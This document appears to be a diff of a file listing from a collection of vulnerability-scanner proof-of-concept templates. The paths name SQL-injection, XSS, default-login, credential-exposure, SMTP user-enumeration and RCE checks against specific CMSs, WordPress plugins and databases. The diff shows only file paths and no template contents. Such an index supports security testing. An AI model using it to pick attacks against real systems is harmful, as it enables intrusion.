./poc/shopify/shopify-shared-secret-10200.yaml +./poc/shopify/shopify-shared-secret-11862.yaml ./poc/shopify/shopify-shared-secret.yaml +./poc/shopify/shopify-takeover-10201.yaml ./poc/shopify/shopify-takeover-10202.yaml ./poc/shopify/shopify-takeover-10203.yaml ./poc/shopify/shopify-takeover-10204.yaml @@ -85438,11 +85465,14 @@ ./poc/smtp/easy-wp-smtp-listing-7154.yaml ./poc/smtp/easy-wp-smtp-listing-7155.yaml ./poc/smtp/easy-wp-smtp-listing-7156.yaml +./poc/smtp/easy-wp-smtp-listing-7157.yaml ./poc/smtp/easy-wp-smtp-listing.yaml ./poc/smtp/easy-wp-smtp.yaml +./poc/smtp/esmtp-detect.yaml ./poc/smtp/esmtprc-config-7257.yaml ./poc/smtp/esmtprc-config-7258.yaml ./poc/smtp/esmtprc-config-7259.yaml +./poc/smtp/esmtprc-config-7260.yaml ./poc/smtp/esmtprc.yaml ./poc/smtp/fluent-smtp-1f4865d4cd8fdc3498ebcb014851d62d.yaml ./poc/smtp/fluent-smtp-3b778a9540e9697f042002204cf51030.yaml @@ -85468,6 +85498,7 @@ ./poc/smtp/post-smtp.yaml ./poc/smtp/postman-smtp-9b1327320928f8320949f2a1e1b93093.yaml ./poc/smtp/postman-smtp.yaml +./poc/smtp/smtp-commands-enum.yaml ./poc/smtp/smtp-detect.yaml ./poc/smtp/smtp-detection.yaml ./poc/smtp/smtp-mail-17bfc79017002e17228cc430ec123896.yaml @@ -85485,9 +85516,11 @@ ./poc/smtp/smtp-mailing-queue-15ed698961200b92fd04c4bfc0e7d42b.yaml ./poc/smtp/smtp-mailing-queue-735ca86f91d78bc5457df0e4ab8721c9.yaml ./poc/smtp/smtp-mailing-queue.yaml +./poc/smtp/smtp-user-enum.yaml ./poc/smtp/smtp2go-detect.yaml ./poc/smtp/smtp2go-ee91f9c261c46a4d21c2dc6337b78e15.yaml ./poc/smtp/smtp2go.yaml +./poc/smtp/totemomail-smtp-detect.yaml ./poc/smtp/unrestricted-sg-ingress-smtp-port.yaml ./poc/smtp/webriti-smtp-mail-76890a3a55491f21b91f4c2317b455a0.yaml ./poc/smtp/webriti-smtp-mail.yaml @@ -85601,7 +85634,7 @@ ./poc/social/api-facebook-422.yaml ./poc/social/api-instagram.yaml ./poc/social/api-linkedin.yaml -./poc/social/api-twitter-507.yaml +./poc/social/api-twitter.yaml ./poc/social/autoshare-for-twitter-551ade1835820cb4823a15f064517dfd.yaml ./poc/social/autoshare-for-twitter-5be8f636cffeef15ffba9b239d7e825e.yaml ./poc/social/autoshare-for-twitter-b98496a862f051b9926ad8f184b175ee.yaml @@ -85806,9 +85839,8 @@ ./poc/social/facebook-pagelike-widget-7b45add6a4db1017bdea5020d0358073.yaml ./poc/social/facebook-pagelike-widget.yaml ./poc/social/facebook-phish.yaml -./poc/social/facebook-secret-7386.yaml +./poc/social/facebook-secret-11849.yaml ./poc/social/facebook-secret.yaml -./poc/social/facebook-secrets.yaml ./poc/social/facebook-wall-and-social-integration-739e4454fbb308c937ef75bb1786deff.yaml ./poc/social/facebook-wall-and-social-integration.yaml ./poc/social/facebook.yaml @@ -85862,7 +85894,7 @@ ./poc/social/floating-social-media-links-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/floating-social-media-links-plugin.yaml ./poc/social/floating-social-media-links.yaml -./poc/social/flow-flow-social-stream-xss-7524.yaml +./poc/social/flow-flow-social-stream-xss.yaml ./poc/social/flow-flow-social-streams-0b11cbe599572e7479985362c28e5bab.yaml ./poc/social/flow-flow-social-streams-b2ca9c85649f9ca0a5356ebbebb714ec.yaml ./poc/social/flow-flow-social-streams-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -85917,7 +85949,6 @@ ./poc/social/instagram-feed-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/instagram-feed-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/instagram-feed-plugin.yaml -./poc/social/instagram-feed.yaml ./poc/social/instagram-for-wordpress-71bb82959fe7ab1e0b311530d80766f1.yaml ./poc/social/instagram-for-wordpress.yaml ./poc/social/instagram-phish.yaml @@ -85969,7 +86000,6 @@ ./poc/social/kiwi-social-share.yaml ./poc/social/lazy-facebook-comments-869b4c99b310f9132fffb57ed8a544a0.yaml ./poc/social/lazy-facebook-comments.yaml -./poc/social/linkedin-client-id.yaml ./poc/social/linkedin-id.yaml ./poc/social/linkedin-phish.yaml ./poc/social/linkedin.yaml @@ -86055,9 +86085,9 @@ ./poc/social/rimons-twitter-widget-8b341a5853c74db00a81c6612967b88a.yaml ./poc/social/rimons-twitter-widget.yaml ./poc/social/sassy-social-share-054e10a9454bde60b36d0b76ce12b2f2.yaml -./poc/social/sassy-social-share-10083.yaml ./poc/social/sassy-social-share-10084.yaml ./poc/social/sassy-social-share-10085.yaml +./poc/social/sassy-social-share-10086.yaml ./poc/social/sassy-social-share-10087.yaml ./poc/social/sassy-social-share-380a93a6eb0678027b6e7c5b3db32454.yaml ./poc/social/sassy-social-share-5d7eeac9d47ec654e4d9145037a7ff62.yaml @@ -86072,6 +86102,7 @@ ./poc/social/sassy-social-share-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/sassy-social-share-plugin.yaml ./poc/social/sassy-social-share-xss.yaml +./poc/social/sassy-social-share.yaml ./poc/social/scriptless-social-sharing-e6bc780a169375a20634676d371e4d7b.yaml ./poc/social/scriptless-social-sharing.yaml ./poc/social/seed-social-2469f603fdf449edfed5d7210aa6c605.yaml @@ -86357,7 +86388,7 @@ ./poc/social/twitter-plugin-73b27079a4e2a001195d157dd0684416.yaml ./poc/social/twitter-plugin-e1d9dfdea2bd6c473515cb426182f4d6.yaml ./poc/social/twitter-plugin.yaml -./poc/social/twitter-secret(1).yaml +./poc/social/twitter-secret-10862.yaml ./poc/social/twitter-secret-11870.yaml ./poc/social/twitter-secret.yaml ./poc/social/twitterdash-04a2ca407d43736d514540aa0f77c4ac.yaml @@ -86434,6 +86465,7 @@ ./poc/social/woocommerce-social-media-share-buttons-9e66720a0e1720448903d3312c56aff4.yaml ./poc/social/woocommerce-social-media-share-buttons.yaml ./poc/social/wordpress-instagram-feed-c6f7df5b11c5d64e4d637b8f3456595f.yaml +./poc/social/wordpress-instagram-feed.yaml ./poc/social/wordpress-social-login-0ca1a42367f86c026446999f0cad23d7.yaml ./poc/social/wordpress-social-login-51b5f902099f5eb8d652f8f14b7b3dca.yaml ./poc/social/wordpress-social-login-b781eead4b5ba9bc8c3b062bb99fd9d7.yaml @@ -86489,7 +86521,6 @@ ./poc/social/wp-social-widget-d7b289a4844fbc5f1814a16ab030f4b4.yaml ./poc/social/wp-social-widget.yaml ./poc/social/wp-social.yaml -./poc/social/wp-socialfit-xss-11577.yaml ./poc/social/wp-socialfit-xss-11579.yaml ./poc/social/wp-socialfit-xss-11580.yaml ./poc/social/wp-socialfit-xss-11581.yaml @@ -86539,7 +86570,6 @@ ./poc/sql/74cms-show-sqli.yaml ./poc/sql/74cms-sqli-1.yaml ./poc/sql/74cms-sqli-1.yml -./poc/sql/74cms-sqli-10.yaml ./poc/sql/74cms-sqli-2.yaml ./poc/sql/74cms-sqli-2.yml ./poc/sql/74cms-sqli-8.yaml @@ -88341,7 +88371,6 @@ ./poc/sql/PbootCMS-ext_price-SQL.yaml ./poc/sql/PbootCMS-search-SQL.yaml ./poc/sql/Qibocms-SQLi.yaml -./poc/sql/SQLInjection_ERROR.yaml ./poc/sql/SQL_injection-Authentification.yaml ./poc/sql/SQL_injection-Error.yaml ./poc/sql/SQL_injection-Numeric.yaml @@ -88443,7 +88472,7 @@ ./poc/sql/adaptive-images-d5d7320d5d056e2a3cdb2f7eac52cfae.yaml ./poc/sql/adb-backup-enabled-60.yaml ./poc/sql/adb-backup-enabled-61.yaml -./poc/sql/adb-backup-enabled-63.yaml +./poc/sql/adb-backup-enabled-62.yaml ./poc/sql/adb-backup-enabled.yaml ./poc/sql/adbConnect.yaml ./poc/sql/adbhoney-detection-cnxn.yaml @@ -88631,6 +88660,7 @@ ./poc/sql/analytics-insights-a52a48fcebcdb3625a324cff9c9c4abe.yaml ./poc/sql/android-debug-database-exposed-312.yaml ./poc/sql/android-debug-database-exposed-313.yaml +./poc/sql/android-debug-database-exposed-314.yaml ./poc/sql/android-debug-database-exposed-315.yaml ./poc/sql/android-debug-database-exposed.yaml ./poc/sql/anfrageformular-6477bf18cad6c823db485408d49b337b.yaml @@ -88647,8 +88677,8 @@ ./poc/sql/apache-loadbalancer-364.yaml ./poc/sql/apache-loadbalancer-365.yaml ./poc/sql/apache-loadbalancer.yaml +./poc/sql/api-abuseipdb-384.yaml ./poc/sql/api-abuseipdb-385.yaml -./poc/sql/api-abuseipdb.yaml ./poc/sql/api-dbt.yaml ./poc/sql/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml ./poc/sql/api2cart-bridge-connector-9310170fdba6634de0183ef1f76c24bb.yaml @@ -88913,7 +88943,6 @@ ./poc/sql/buffer-my-post-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/buildbot-panel-803.yaml ./poc/sql/buildbot-panel.yaml -./poc/sql/buildbot-panel.yml ./poc/sql/builder-contact-05cefda973a9af46db8fb07d4529e095.yaml ./poc/sql/builderchild-depot-73cea7db1be46dff05c6aee565d437e4.yaml ./poc/sql/builderchild-market-821582b5b11984a87b87b51e730e4dbe.yaml @@ -89191,10 +89220,11 @@ ./poc/sql/couchdb-admin-party.yaml ./poc/sql/couchdb-adminparty-1235.yaml ./poc/sql/couchdb-adminparty-1236.yaml +./poc/sql/couchdb-adminparty-1237.yaml ./poc/sql/couchdb-adminparty.yaml ./poc/sql/couchdb-cve-2017-12635.yml ./poc/sql/couchdb-detect.yaml -./poc/sql/couchdb-exposure-1238.yaml +./poc/sql/couchdb-exposure-1239.yaml ./poc/sql/couchdb-exposure-1240.yaml ./poc/sql/couchdb-exposure-1241.yaml ./poc/sql/couchdb-exposure.yaml @@ -89340,8 +89370,8 @@ ./poc/sql/dbeaver-credentials-6777.yaml ./poc/sql/dbeaver-credentials-6778.yaml ./poc/sql/dbeaver-credentials-6779.yaml +./poc/sql/dbeaver-credentials-6780.yaml ./poc/sql/dbeaver-credentials-6781.yaml -./poc/sql/dbeaver-credentials-6782.yaml ./poc/sql/dbeaver-data-sources.yaml ./poc/sql/dbox-slider-lite-586ec0e258aacc454495dc60bd3b6dd6.yaml ./poc/sql/dbox-slider-lite.yaml @@ -89354,7 +89384,6 @@ ./poc/sql/debug-log-manager-df86fb073cfdbcf3c878e8167244dee2.yaml ./poc/sql/dedecms-guestbook-sqli.yaml ./poc/sql/dedecms-guestbook-sqli.yml -./poc/sql/dedecms-membergroup-sqli-6796.yaml ./poc/sql/dedecms-membergroup-sqli-6797.yaml ./poc/sql/dedecms-membergroup-sqli-6798.yaml ./poc/sql/dedecms-membergroup-sqli-6799.yaml @@ -89451,6 +89480,7 @@ ./poc/sql/dt-chocolate-e413241db5fe0999f0d07693f38484de.yaml ./poc/sql/dt-the7-25c26816f9e2edbda826ac056e4f2bce.yaml ./poc/sql/dukapress-42d1930756a0a540db942aacdf5f0b12.yaml +./poc/sql/duomicms-sql-injection-7122.yaml ./poc/sql/duomicms-sql-injection-7123.yaml ./poc/sql/duomicms-sql-injection-7124.yaml ./poc/sql/duomicms-sql-injection-7125.yaml @@ -89585,8 +89615,10 @@ ./poc/sql/elasta-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/elasta-9437ebb08533440a4a517ccdbbdd6db9.yaml ./poc/sql/elasticsearch-sql-client-detect-7189.yaml +./poc/sql/elasticsearch-sql-client-detect-7190.yaml ./poc/sql/elasticsearch-sql-client-detect-7191.yaml ./poc/sql/elasticsearch-sql-client-detect-7192.yaml +./poc/sql/elasticsearch-sql-client-detect.yaml ./poc/sql/elation-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/electric-studio-client-login-f80c5406ebadb06c127dd29569b85330.yaml ./poc/sql/elegance-e6998b25801bfa9dbabfae7a038d5dab.yaml @@ -89639,7 +89671,6 @@ ./poc/sql/erp-41efa6c5a9fb90d8db7dba7086492b1f.yaml ./poc/sql/error-based-get-sql-injection.yaml ./poc/sql/error-based-post-sql-injection.yaml -./poc/sql/error-based-sql-injection-7249.yaml ./poc/sql/error-based-sql-injection-7250.yaml ./poc/sql/error-based-sql-injection.yaml ./poc/sql/error-log-monitor-6477bf18cad6c823db485408d49b337b.yaml @@ -89660,6 +89691,7 @@ ./poc/sql/etouch-v2-sqli-7266.yaml ./poc/sql/etouch-v2-sqli-7267.yaml ./poc/sql/etouch-v2-sqli-7268.yaml +./poc/sql/etouch-v2-sqli.yaml ./poc/sql/etouch-v2-sqli.yml ./poc/sql/etsy-shop-39c40700fae07d31c1177ca5a04fbddb.yaml ./poc/sql/euclid-94f5de6d90a642c9d8b9cf7e442771db.yaml @@ -89701,7 +89733,6 @@ ./poc/sql/exposed-mysql-initial-7322.yaml ./poc/sql/exposed-mysql-initial-7323.yaml ./poc/sql/exposed-mysql-initial-7324.yaml -./poc/sql/exposed-mysql-initial.yaml ./poc/sql/exposed-sqlite-manager-1.yaml ./poc/sql/exposed-sqlite-manager-2.yaml ./poc/sql/exposed-sqlite-manager-7350.yaml @@ -89965,6 +89996,7 @@ ./poc/sql/glorious-services-support-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glorious-sites-installer-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glossary-by-codeat-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/glpi-9.3.3-sql-injection.yaml ./poc/sql/gm-woo-product-list-widget-c7d55594227f574d6f5e336946adb772.yaml ./poc/sql/go-fetch-jobs-wp-job-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/go-viral-6477bf18cad6c823db485408d49b337b.yaml @@ -89990,8 +90022,8 @@ ./poc/sql/gracemedia-media-player-64ea0eeccf3559dee1e80fcbdba4b03b.yaml ./poc/sql/grails-database-admin-console-1.yaml ./poc/sql/grails-database-admin-console-2.yaml +./poc/sql/grails-database-admin-console-7819.yaml ./poc/sql/grails-database-admin-console-7820.yaml -./poc/sql/grails-database-admin-console-7821.yaml ./poc/sql/grails-database-admin-console-7822.yaml ./poc/sql/grails-database-admin-console.yaml ./poc/sql/grand-media-726e7ed9b1339db57e24cd9d4d4fb0ff.yaml @@ -90038,7 +90070,7 @@ ./poc/sql/hasura-graphql-psql-exec-7899.yaml ./poc/sql/hasura-graphql-psql-exec-7900.yaml ./poc/sql/hasura-graphql-psql-exec-7901.yaml -./poc/sql/hasura-graphql-psql-exec-7902.yaml +./poc/sql/hasura-graphql-psql-exec.yaml ./poc/sql/haxcan-190425548dd1ddbb7321f1738c27beea.yaml ./poc/sql/hdw-player-video-player-video-gallery-32d133fdb223a5192744426dcadada98.yaml ./poc/sql/header-blind-sql-injection.yaml @@ -90132,6 +90164,7 @@ ./poc/sql/indianic-testimonial-f78c6816c05a37309db615f55d9b6da6.yaml ./poc/sql/influxdata-influxdb.yaml ./poc/sql/influxdb-detect-8158.yaml +./poc/sql/influxdb-detect-8159.yaml ./poc/sql/influxdb-detect.yaml ./poc/sql/influxdb-panel.yaml ./poc/sql/influxdb-unauth.yaml @@ -90184,9 +90217,9 @@ ./poc/sql/izeechat-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/sql/jayj-quicktag-366869a40f4817ab10ef24fadbc9f402.yaml ./poc/sql/jcwp-youtube-channel-embed-a759e03a3140ab5da9f810ffbdb3a4c2.yaml +./poc/sql/jdbc-connection-string-8244.yaml ./poc/sql/jdbc-connection-string-8245.yaml ./poc/sql/jdbc-connection-string-8246.yaml -./poc/sql/jdbc-connection-string.yaml ./poc/sql/jds-portfolio-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/jeecg-boot-queryFieldBySql-sqli.yaml ./poc/sql/jeeng-push-notifications-b9d756b997db8ed19a92f52d10f55566.yaml @@ -90264,7 +90297,7 @@ ./poc/sql/kevinlab-bems-sqli-8457.yaml ./poc/sql/kevinlab-bems-sqli-8458.yaml ./poc/sql/kevinlab-bems-sqli-8459.yaml -./poc/sql/kevinlab-bems-sqli.yaml +./poc/sql/kevinlab-bems-sqli-8460.yaml ./poc/sql/keyring-277e8db0f83e2ead4ec7d2162ead5590.yaml ./poc/sql/kiddo-7fa1db2a3827aea23db588d86205cc8c.yaml ./poc/sql/kingcomposer-05188a9e745621e726abdb2848d4cfa0.yaml @@ -90485,7 +90518,6 @@ ./poc/sql/mongodb-detect-8920.yaml ./poc/sql/mongodb-detect-8921.yaml ./poc/sql/mongodb-detect.yaml -./poc/sql/mongodb-ops-manager-8922.yaml ./poc/sql/mongodb-ops-manager-8923.yaml ./poc/sql/mongodb-ops-manager-8924.yaml ./poc/sql/mongodb-ops-manager.yaml @@ -90493,7 +90525,6 @@ ./poc/sql/mongodb-unauth-8926.yaml ./poc/sql/mongodb-unauth-8927.yaml ./poc/sql/mongodb-unauth-8928.yaml -./poc/sql/mongodb-unauth.yaml ./poc/sql/mongodb.yaml ./poc/sql/monsters-editor-10-for-wp-super-edit-973edbc42b401e04f2817347dbb88982.yaml ./poc/sql/montezuma-dce503013f1232677b5db16aa72f0316.yaml @@ -90656,8 +90687,8 @@ ./poc/sql/ooorl-e3ffba36446f7dba2b794300461eb826.yaml ./poc/sql/open-external-links-in-a-new-window-65c98e7490918c36cf9db80ea2af7d28.yaml ./poc/sql/open-user-map-c2ea245347709cabfb352a7cf46c6db8.yaml -./poc/sql/openerp-database-9275.yaml ./poc/sql/openerp-database-9276.yaml +./poc/sql/openerp-database-9277.yaml ./poc/sql/openerp-database-9278.yaml ./poc/sql/openerp-database.yaml ./poc/sql/opening-hours-9fde58251e15e0ed15dbb0f57c33cf3e.yaml @@ -90672,6 +90703,7 @@ ./poc/sql/option-tree-ae18e342651d194dbc1007204717b118.yaml ./poc/sql/oracle-dbass-detect-9349.yaml ./poc/sql/oracle-dbass-detect-9350.yaml +./poc/sql/oracle-dbass-detect-9351.yaml ./poc/sql/oracle-dbcs-9352.yaml ./poc/sql/oracle-dbcs-9353.yaml ./poc/sql/oracle-dbcs-9354.yaml @@ -90679,7 +90711,6 @@ ./poc/sql/oracle-ebs-sqllog-disclosure-9367.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9370.yaml -./poc/sql/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9372.yaml ./poc/sql/oracle-ebs-sqllog-disclosure.yaml ./poc/sql/oracle-webdb.yaml @@ -90740,7 +90771,6 @@ ./poc/sql/paytium-6bfa7db55abe86e184a7874b8579256d.yaml ./poc/sql/paytium-dbb33df02ad82d104f52342b9d1314f4.yaml ./poc/sql/payu-india-dfb44dbc510f4bea6f74c6a6cb7e4f69.yaml -./poc/sql/pbootcms-database-file-download-9469.yaml ./poc/sql/pbootcms-database-file-download.yaml ./poc/sql/pbootcms-database-file-download.yml ./poc/sql/pdf-block-615a079e3552dbff38dc6dbbb7a3554e.yaml @@ -90788,7 +90818,7 @@ ./poc/sql/php-event-calendar-12517f8593a63dbf79626b073a1f1de2.yaml ./poc/sql/php-everywhere-4214d6b172adab03dfd74f128fc5db19.yaml ./poc/sql/phpmyadmin-sql-9534.yaml -./poc/sql/phpmyadmin-sql-9535.yaml +./poc/sql/phpmyadmin-sql-9536.yaml ./poc/sql/phpmyadmin-sql.php-server-1.yaml ./poc/sql/phpmyadmin-sql.php-server-2.yaml ./poc/sql/phpmyadmin-sql.php-server.yaml @@ -90803,6 +90833,7 @@ ./poc/sql/pie-register-1e2d1b7026d2269694eb54e49db13853.yaml ./poc/sql/pie-register-51840cf3f730edb817a845513e726762.yaml ./poc/sql/pie-register-edb5da07e3386d078b8f2dfd3f0d66a1.yaml +./poc/sql/pikpikcusqli.yaml ./poc/sql/pinblocks-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/pinfinity-fcc940cb5d1edc9fa0dbfe45ecb68894.yaml ./poc/sql/piotnet-addons-for-elementor-pro-ff0dbabbd59c76a52ed540a831253c70.yaml @@ -90923,13 +90954,14 @@ ./poc/sql/protected-posts-logout-button-cfa021969edb2cc77a22385f05d3d58a.yaml ./poc/sql/protected-posts-logout-button-f1f050c9551d531054bfb61b8db76214.yaml ./poc/sql/puppetdb-detect-9717.yaml -./poc/sql/puppetdb-detect-9718.yaml +./poc/sql/puppetdb-detect-9719.yaml +./poc/sql/puppetdb-detect.yaml ./poc/sql/purosa-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/purple-xmls-google-product-feed-for-woocommerce-295f15d122686442e45193dbdf2a0a52.yaml ./poc/sql/purus-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/push-notification-for-post-and-buddypress-87654db6955354f5bcd20cc2f2f16ee6.yaml ./poc/sql/push-notification-for-wp-by-pushassist-a580f69484329c1256ea5b0e7db07107.yaml -./poc/sql/python-app-sql-exceptions-9744.yaml +./poc/sql/python-app-sql-exceptions.yaml ./poc/sql/q-and-a-cc8c9007fdb35c296b605f6ee57b128b.yaml ./poc/sql/qaengine-4ce5db8cdf77b4cf41d832a359d6b011.yaml ./poc/sql/qards-a5b42edbed684a8355294b4718afe158.yaml @@ -90973,7 +91005,6 @@ ./poc/sql/radio-station-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/rafflepress-674f824db8b82cb4268e998598fbe92b.yaml ./poc/sql/rails-database-config-9801.yaml -./poc/sql/rails-database-config-9802.yaml ./poc/sql/rails-database-config-9803.yaml ./poc/sql/rails-database-config-9804.yaml ./poc/sql/raindrops-dbfc5df17890ba20d8e1b8aa01de85b4.yaml @@ -91197,7 +91228,7 @@ ./poc/sql/seosamba-webmasters-7db61b9f5c5ddec4aae0861e6db4dd70.yaml ./poc/sql/sequoiadb-.yaml ./poc/sql/sequoiadb-default-login-10150.yaml -./poc/sql/sequoiadb-default-login-10151.yaml +./poc/sql/sequoiadb-default-login-10152.yaml ./poc/sql/sequoiadb-login.yaml ./poc/sql/seraphinite-accelerator-b57c1ea2fac5687dbdaf7cc2388b8807.yaml ./poc/sql/serial-codes-generator-and-validator-864d2c788f4e15b5840dcd249fcf31db.yaml @@ -91253,6 +91284,7 @@ ./poc/sql/simple-crm-sql-injection-10275.yaml ./poc/sql/simple-crm-sql-injection-10276.yaml ./poc/sql/simple-crm-sql-injection-10277.yaml +./poc/sql/simple-crm-sql-injection-10278.yaml ./poc/sql/simple-download-monitor-2330ad95b0dbdb338f22f0d6190d1115.yaml ./poc/sql/simple-download-monitor-acf76b3af35ee093a6fa7ddb52d25cf2.yaml ./poc/sql/simple-event-planner-7ceec850355db17a8c0cb10289c120cb.yaml @@ -91386,17 +91418,15 @@ ./poc/sql/spnbabble-c3bb72f97b80dbb6cad269092d76789a.yaml ./poc/sql/spotlight-social-photo-feeds-31332334a57dbabbdbe1cfdea5489469.yaml ./poc/sql/spotlight-social-photo-feeds-6477bf18cad6c823db485408d49b337b.yaml -./poc/sql/springboot-h2-db-rce-10454.yaml +./poc/sql/springboot-h2-db-rce-10455.yaml ./poc/sql/springboot-h2-db-rce-10456.yaml ./poc/sql/springboot-h2-db-rce-10457.yaml ./poc/sql/springboot-h2-db-rce-10458.yaml -./poc/sql/springboot-h2-db-rce.yaml ./poc/sql/sprout-clients-503c868f614fe8f9ba65b257aadb9679.yaml ./poc/sql/sql-buddy.yaml ./poc/sql/sql-dump-1.yaml ./poc/sql/sql-dump-10.yaml ./poc/sql/sql-dump-10496.yaml -./poc/sql/sql-dump-10497.yaml ./poc/sql/sql-dump-10498.yaml ./poc/sql/sql-dump-10499.yaml ./poc/sql/sql-dump-11.yaml @@ -91426,6 +91456,7 @@ ./poc/sql/sql-server-report-viewer.yaml ./poc/sql/sql-server-reporting-10507.yaml ./poc/sql/sql-server-reporting-10508.yaml +./poc/sql/sql-server-reporting-10509.yaml ./poc/sql/sql-server-reporting-10510.yaml ./poc/sql/sql-server-reporting.yaml ./poc/sql/sql-shortcode-003f309c7f400c3e24a0ee3414677f42.yaml @@ -91443,13 +91474,11 @@ ./poc/sql/sqli-symfony.yaml ./poc/sql/sqli-vuln-params-deep.yaml ./poc/sql/sqli-vuln-params.yaml -./poc/sql/sqli.yaml ./poc/sql/sqli2.yaml ./poc/sql/sqli_b_sleep.yaml ./poc/sql/sqli_error.yaml ./poc/sql/sqli_header-10504.yaml ./poc/sql/sqli_header.yaml -./poc/sql/sqliheader.yaml ./poc/sql/squaretype-091113ce7c8db36e32f582519aa46cca.yaml ./poc/sql/squelch-tabs-and-accordions-shortcodes-edff964dd77c6dc21314abdb7279a72c.yaml ./poc/sql/squirrly-seo-854560bdbe36e274b7e434f50a00f0f2.yaml @@ -91532,8 +91561,8 @@ ./poc/sql/survey-maker-303a2347dc54131b7611638dd930dba9.yaml ./poc/sql/surveyfunnel-lite-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/surveys-6e9e122eb2e0c40dbc732f93cb774f75.yaml +./poc/sql/suspicious-sql-error-messages-10585.yaml ./poc/sql/suspicious-sql-error-messages-10586.yaml -./poc/sql/suspicious-sql-error-messages.yaml ./poc/sql/sv-provenexpert-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/sv-tracking-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/svg-flags-lite-6477bf18cad6c823db485408d49b337b.yaml @@ -91546,8 +91575,8 @@ ./poc/sql/sydney-toolbox-6ebed23b763fe33f9cdffde1a1db7852.yaml ./poc/sql/symfony-database-config-10614.yaml ./poc/sql/symfony-database-config-10615.yaml -./poc/sql/symfony-database-config-10616.yaml ./poc/sql/symfony-database-config-10617.yaml +./poc/sql/symfony-database-config.yaml ./poc/sql/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/synotec-holdings-sql-injection.yaml ./poc/sql/syntaxhighlighter-6af94db0b5d5eb521508ffb351943a35.yaml @@ -91598,8 +91627,8 @@ ./poc/sql/theplus_elementor_addon-09adbccd120b1c5acc601f143faa1b99.yaml ./poc/sql/thinkit-wp-contact-form-7ed0b79f90893e5693dbcb25c3989983.yaml ./poc/sql/thumbs-db-disclosure-10760.yaml +./poc/sql/thumbs-db-disclosure-10761.yaml ./poc/sql/thumbs-db-disclosure-10762.yaml -./poc/sql/thumbs-db-disclosure-10763.yaml ./poc/sql/thumbs-rating-2551aea37293f7feb377db28af59096c.yaml ./poc/sql/ti-woocommerce-wishlist-693cf8c022651775af0db87e0b8f752d.yaml ./poc/sql/ti-woocommerce-wishlist-premium-693cf8c022651775af0db87e0b8f752d.yaml @@ -91609,7 +91638,6 @@ ./poc/sql/tidb-native-password.yaml ./poc/sql/tidb-unauth-10770.yaml ./poc/sql/tidb-unauth-10771.yaml -./poc/sql/tidb-unauth-10772.yaml ./poc/sql/tidio-live-chat-5841edbae5f362f60a79d9cb73e8dd52.yaml ./poc/sql/tier-pricing-table-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/time-based-sql-injection.yaml @@ -91686,7 +91714,7 @@ ./poc/sql/ucmdb-default-login-10868.yaml ./poc/sql/ucmdb-default-login-10869.yaml ./poc/sql/ucmdb-default-login-10870.yaml -./poc/sql/ucmdb-default-login.yaml +./poc/sql/ucmdb-default-login-10871.yaml ./poc/sql/ucontext-8226db0cec7c7280f1367e900997219e.yaml ./poc/sql/ulisting-5dbc01f7b0f6c2a386a3664610ac3e23.yaml ./poc/sql/ulisting-7866bac5db8939bd8423ae7ad6c6a87c.yaml @@ -92137,6 +92165,7 @@ ./poc/sql/wordpress-db-repair-11252.yaml ./poc/sql/wordpress-db-repair-11253.yaml ./poc/sql/wordpress-db-repair-11255.yaml +./poc/sql/wordpress-db-repair.yaml ./poc/sql/wordpress-db3daefc79ef0c3afc5d2a722651f6df.yaml ./poc/sql/wordpress-e2566e3cb656dbaa90bc1ac1fbedb4e7.yaml ./poc/sql/wordpress-e5dc50bdb28e6fe52cbb89ba11d1e83a.yaml @@ -92620,7 +92649,6 @@ ./poc/sql/ws-bootstrap-vc-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/ws-form-9d0ef762c4db1d0bcffaeecbf6f5c7bb.yaml ./poc/sql/wupo-group-attributes-6477bf18cad6c823db485408d49b337b.yaml -./poc/sql/wuzhicms-sqli-11656.yaml ./poc/sql/wuzhicms-sqli-11657.yaml ./poc/sql/wuzhicms-sqli-11658.yaml ./poc/sql/wuzhicms-sqli-11659.yaml @@ -92632,11 +92660,9 @@ ./poc/sql/xcloner-backup-and-restore-af2601db04528a0b59f4305584ecbd5d.yaml ./poc/sql/xdcms-sql.yaml ./poc/sql/xdcms-sql.yml -./poc/sql/xdcms-sqli-11664.yaml ./poc/sql/xdcms-sqli-11665.yaml ./poc/sql/xdcms-sqli-11666.yaml ./poc/sql/xdcms-sqli-11667.yaml -./poc/sql/xdcms-sqli.yaml ./poc/sql/xhanch-my-twitter-13afd7959bdba431246ec18eac06eb55.yaml ./poc/sql/xo-event-calendar-4141db509b6d506a88a5f846b22304e8.yaml ./poc/sql/xray-clandbeta.yaml @@ -92673,8 +92699,8 @@ ./poc/sql/yongyou-ICurrtype-sqli.yaml ./poc/sql/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml ./poc/sql/yongyou-U8-sqli.yaml +./poc/sql/yongyou-icurrtype-sqli.yaml ./poc/sql/yongyou-jdbcRead.yaml -./poc/sql/yongyou-jdbcread.yaml ./poc/sql/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/sql/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml 